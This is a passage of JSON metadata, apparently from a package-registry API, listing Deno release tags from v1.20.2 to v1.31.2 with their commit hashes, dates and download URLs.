d/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/